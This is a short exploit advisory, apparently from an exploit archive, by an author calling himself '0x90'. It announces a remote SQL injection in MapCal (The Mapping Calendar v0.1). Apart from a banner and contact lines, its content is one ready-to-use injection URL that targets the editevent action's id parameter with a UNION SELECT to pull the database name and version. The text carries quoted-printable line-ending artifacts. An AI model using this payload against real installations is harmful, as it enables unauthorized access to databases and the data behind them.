|
_____ ____ _____=0D
/ _ \ /\ /\ / _ \ / _ \=0D
| | | | \ \/ / ||_| | | | | | =0D
| | | | \ / \_ | | | | | =0D
| |_| | / \ __\ | | |_| |=0D
\_____/ / /\ \ |____/ \_____/=0D
\/ \/=0D
=0D
[~] MapCal - The Mapping Calendar (v. 0.1) Remote SQL Injection=0D
=0D
[~] Author: 0x90=0D
=0D
[~] HomePage: www.0x90.com.ar=0D
=0D
[~] Contact: Guns[at]0x90[dot]com[dot]ar=0D
=0D
[~] Script: MapCal - The Mapping Calendar=0D
=0D
[~] site: http://mapcal.sourceforge.net=0D
=0D
[~] Vulnerability Class: SQL Injection=0D
=0D
=0D
=0D
[~] Exploit:=0D
=0D
http://localhost/cms/index.php?action=editevent&id=-0x90+union+select+0x90,0x90,0x90,concat(0x3a,database(),0x3a,version()),0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90+from+events